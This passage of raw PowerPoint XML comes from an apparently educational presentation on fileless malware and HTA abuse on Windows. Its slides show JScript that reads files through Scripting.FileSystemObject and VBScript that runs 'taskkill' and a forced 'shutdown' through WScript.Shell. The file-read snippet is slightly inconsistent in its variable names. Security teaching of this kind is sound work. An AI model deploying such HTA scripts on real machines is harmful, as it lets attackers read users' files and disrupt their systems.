        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4230154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29</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517210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94AABD-FA9A-4595-B0DC-B43C8EC57D89}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>3</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>無檔案式威脅透過文件漏洞發動攻擊的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>過程 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>資安趨勢部落格</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" i="1" baseline="-25000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2050" name="Picture 2" descr="https://documents.trendmicro.com/images/TEx/articles/security-101-defending-against-fileless-malwa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67" y="3068959"/>
            <a:ext cx="8855435" cy="272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29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2675467"/>
            <a:ext cx="8568952" cy="3450696"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Read file (Write/Append file is similar) — use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ActiveXObject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Scripting.FileSystemObject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>”)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;script language="JavaScript"&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2100" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2100" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2100" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fso</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2100" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2100" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ActiveXObject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2100" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Scripting.FileSystemObject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>");</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2100" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2100" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ForReading</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = 1;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2100" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> file = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2100" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fso.OpenTextFile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(filename, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2100" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ForReading</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2100" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> text = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2100" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>file.ReadAll</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>();</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>f1.close();</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2100" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00A249"/>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30</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Things That We Can Do with HTA on the Windows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>System (1) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" err="1">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Đỗ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t> Anh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" err="1">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Tú</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1433237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a:t>Run shell script — </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>CreateObject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>WScript.Shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>”)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;script language="VBScript"&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1900" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>objwsh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1900" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>CreateObject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1900" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>WScript.Shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>") </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1900" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>objwsh.Run</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1900" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>taskkill</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> /f /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1900" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>im</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> notepad.exe", , True</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1900" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>objwsh.Run</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> "shutdown -s /t 00", , True</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A249"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
